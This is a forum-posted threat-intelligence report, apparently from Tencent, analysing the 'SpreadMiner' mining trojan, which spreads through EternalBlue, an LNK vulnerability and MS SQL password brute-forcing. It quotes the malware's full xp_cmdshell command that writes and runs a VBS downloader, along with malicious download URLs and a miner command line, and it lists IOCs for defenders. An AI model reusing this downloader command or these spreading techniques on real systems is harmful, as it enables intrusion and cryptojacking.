查看: 1636|回复: 1
收起左侧

[技术原创] 腾讯安全御见威胁情报中心截获粗鲁的矿工,三种方式猛攻企业网络

[复制链接]
腾讯电脑管家
发表于 2019-6-12 17:14:49 | 显示全部楼层 |阅读模式
一、背景
腾讯安全御见威胁情报中心捕获到一个利用多种方式在内网攻击传播的挖矿木马SpreadMiner。该木马会利用永恒之蓝漏洞(MS17-010)攻击内网;利用Lnk漏洞(CVE-2017-8464)通过共享目录和移动存储设备感染传播;同时还对MS SQL服务器进行弱口令爆破攻击。被攻陷的机器会执行Payload植入挖矿木马。因病毒作者在代码多处用词、命名十分粗鲁,腾讯安全专家将其命名为“粗鲁的矿工”。腾讯电脑管家、腾讯御点终端安全管理系统均可查杀该病毒。

“永恒之蓝”漏洞(MS17-010)自从被黑客组织公开后,一直是最受病毒传播者最青睐的攻击工具,曾被WannaCry等多种著名病毒使用,大多数用户已经修复了此漏洞,但遗憾的是,仍有一部分未修复漏洞的用户(主要是企业用户)面临被攻击的危险。

Lnk漏洞(CVE-2017-8464)和此前震网病毒所使用的零日漏洞类似,可被用来攻击基础设施、存放关键资料的核心隔离系统等,微软在2017年6月安全更新中推出相关补丁,但至今仍有部分用户电脑未及时修复漏洞。该漏洞的特点是只要查看到攻击Lnk文件所在的文件夹,就会触发漏洞,因而有“看一眼就中毒”的“美誉”。该漏洞被广泛用来通过局域网共享目录、或移动存储介质传播病毒。
另外,因一部分企业管理员安全意识薄弱,在配置MS SQL服务器的sa账号登录时,使用了强度不高的密码,容易被黑客暴力破解。
上述三种攻击传播方式任意一种攻击得手,都会运行Spread.exe释放门罗币挖矿程序。病毒的攻击模块则继续进行下一轮攻击传播,不断循环该过程,从而可能导致内网中毒电脑不断增加。为避免挖矿时系统资源消耗严重被用户发现,病毒会检查任务管理器进程,一旦发现,立刻退出程序停止挖矿。
粗鲁的矿工(SpreadMiner)同时使用两个Windows高危漏洞、以及MS SQL弱口令爆破的方法对企业网络进行攻击,威胁极大。腾讯安全专家建议政企机构高度警惕,应及时修复安全漏洞避免受害。
SpreadMiner攻击流程

二、详细分析SMB445.exe
SMB445.exe为SFX压缩生成的程序,运行时释放NSA攻击武器、配置文件、Payload文件等到ProgramData目录下。利用释放文件中的双脉冲星serverlong.exe,永恒之蓝svchostlong.exe针对开放445/139端口的机器进行攻击,并在攻陷机器执行Payload程序X86.dll或X64.dll。
压缩程序释放文件:

双脉冲星攻击配置文件:

永恒之蓝攻击配置文件:

攻击成功后执行Payload模块X86/X64.dll,进而在目标机器下载执行Spread.exe、services.exe,为了保证植入成功,Payload模块同时采用两种方法进行下载,一种为调用InternetOpenUrlW、InternetReadFile系列函数下载文件,另一种为通过创建脚本vbs.vbs,然后利用该脚本中的下载命令下载文件。
直接调用函数下载:

创建脚本Vbs.vbs进行下载:

Spread.exe
Payload下载的Spread.exe首先添加自身到注册表启动项,以达到持久化
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\xy3602
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\XPWIN7

然后通过SetFileAttributesA将文件设置为隐藏属性,代码中共出现22处SetFileAttributesA的调用,将木马释放的所有子文件及其相关目录设置为隐藏属性,使其在执行时不易被发现


木马使用的下载地址URL、互斥体名称等字符被加密后保存,在使用前会先进行解密,解密方法为取加密数据的一个字节,取解密数列中的一个字节,将两者异或,得到解密后的数据。
1.将解密数据0x8、0x3、0x2等数据按照一定的序列保存到堆栈中

2.解密函数从数据段中取出加密字符,从堆栈中按照顺序取出解密数据,将两者进行异或运算,得到解密后的字符

3.加密字符内容:

4.解密后的字符数据(原内存地址):


接下来根据解密得到的URL,下载多个类型的攻击模块进行攻击:
1.永恒之蓝漏洞(MS17-010)攻击
利用解密后的下载地址(http[:]//47.106.217.147/smb445.exe),下载得到永恒之蓝攻击模块SMB445.exe,针对内网中开放139/445端口的机器进行漏洞攻击

2.Lnk漏洞(CVE-2017-8464)攻击利用解密后的下载地址(http[:]//qf-password.top:20190/CVE-2017-8464.exe),下载Lnk漏洞攻击模块CVE-2017-8464.exe,执行后释放大量附带漏洞触发代码的Lnk文件,以及利用漏洞加载Payload文件(OuWZjtdbLqFVMSLF.dllWmOXSshkpQfaLVED.dll)。这种攻击方式可导致任何访问共享目录的存在漏洞的电脑被感染,也可通过U盘、移动硬盘等存储设备进行感染。


Lnk漏洞攻击后加载的DLL(OuWZjtdbLqFVMSLF.dll、WmOXSshkpQfaLVED.dll)执行后,和永恒之蓝漏洞攻击后的Payload(X86.dll/X64.dll)功能一样,都是从服务器下载Spread.exe、server.exe进行下一步攻击

3.MS SQL弱口令爆破攻击
利用解密后的下载地址(http[:]//qf-password.top:20190/sqlserver.exe),下载MS SQL爆破攻击模块sqlserver.exe,扫描指定IP范围内的机器1433端口,对开放1433端口的机器使用内置的用户名、密码字典尝试爆破连接。


爆破登录成功后,在目标机器通过创建和执行脚本1433.vbs,下载木马进行感染,执行Shell命令如下:
exec xp_cmdshell cmd /c cd C:\ProgramData &&del /f /q 1433.vbs && echo on error resume next >C:\ProgramData\1433.vbs
&& echo with wscript:if .arguments.count^<2 then .quit:end if >>C:\ProgramData\1433.vbs
&& echo set aso=.createobject("adodb.stream"):set w
eb=createobject("microsoft.xmlhttp") >>C:\ProgramData\1433.vbs &&
echo web.open "get",.arguments(0),0:web.send:if web.status^>200
then quit >>C:\ProgramData\1433.vbs && echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:
end with>>C:\ProgramData\1433.vbs
&& cscript C:\ProgramData\1433.vbs

挖矿进程
开始挖矿前检测任务管理器,若检测到任务管理器进程,则退出挖矿程序

然后搜集安装的杀毒软件信息,关注的杀软进程列表如下:


从资源文件中释放挖矿木马到C:\ProgramData\QQPCRTP3610.exe,将其设置为隐藏属性,并启动挖矿

该挖矿木马采用开源挖矿程序XMRig修改编译而成,编译时间显示为2019年3月,木马作者还十分嚣张地将原始程序支持的“-help”命令返回提示修改为“SB,FUCK YOU”。

挖矿时启动命令行:
C:\ProgramData\QQPCRTP3610.exe -o stratum+tcp://qf-password.top:446 --max-cpu-usage=25 -K
连接矿池地址:qf-password.top:446

三、安全建议
1.及时下载并更新Windows系统补丁,及时修复永恒之蓝(MS17-010)系列漏洞,Lnk漏洞(CVE-2017-8464)
MS17-010:
XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、Windows Server 2008、Windows 10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh ... urity/ms17-010.aspx
CVE-2017-8464:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464
2.服务器使用高强度密码(特别是MS SQL服务器的sa账户),切勿使用弱口令,防止黑客暴力破解
3.使用腾讯御点或腾讯电脑管家拦截病毒攻击(https://s.tencent.com/product/yd/index.html

4.推荐企业用户部署腾讯御界高级威胁检测系统及时捕捉黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。(https://s.tencent.com/product/gjwxjc/index.html

IOCs
IP
69.165.65.194
47.106.217.147
47.104.110.131
Domain
qf-password.top
fuckyoupassword.top
MD5
ff5fa32898f462f597a25896a73e733d
ac4b1746d1a1632d0bd2cddf20a797b1
4fb1fd6be7c1c9dbcba5f5c65eb589e0
2bde1d04b30c75bafaa1f20298d74586
69ab8c48d870cd62fff9fe40863089ed
954bf4f31ef2d3883da4569d05d2a5e0
2db12953f12665b35336afabc597196f
URL
http[:]//69.165.65.194/server.exe
http[:]//47.106.217.147/smb445.exe
http[:]//47.106.217.147/server.exe
http[:]//47.106.217.147/svchosa.exe
http[:]//47.106.217.147/a.exe
http[:]//qf-password.top/spread.exe
http[:]//qf-password.top:20190/smb445.exe
http[:]//qf-password.top:20190/sqlserver.exe
http[:]//qf-password.top:20190/WMI.exe
http[:]//qf-password.top:20190/A.exe
http[:]//qf-password.top:20190/N.exe
http[:]//qf-password.top:20190/CVE-2017-8464.exe
http[:]//fuckyoupassword.top:20190/spread.exe
http[:]//fuckyoupassword.top:20190/SMB445.exe
http[:]//fuckyoupassword.top:20190/server.exe
矿池:
qf-password.top:446

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
BFAX
头像被屏蔽
发表于 2019-6-21 17:34:46 | 显示全部楼层
哈哈哈,最惨官人,给Q管挽尊
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-22 11:31 , Processed in 0.126689 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表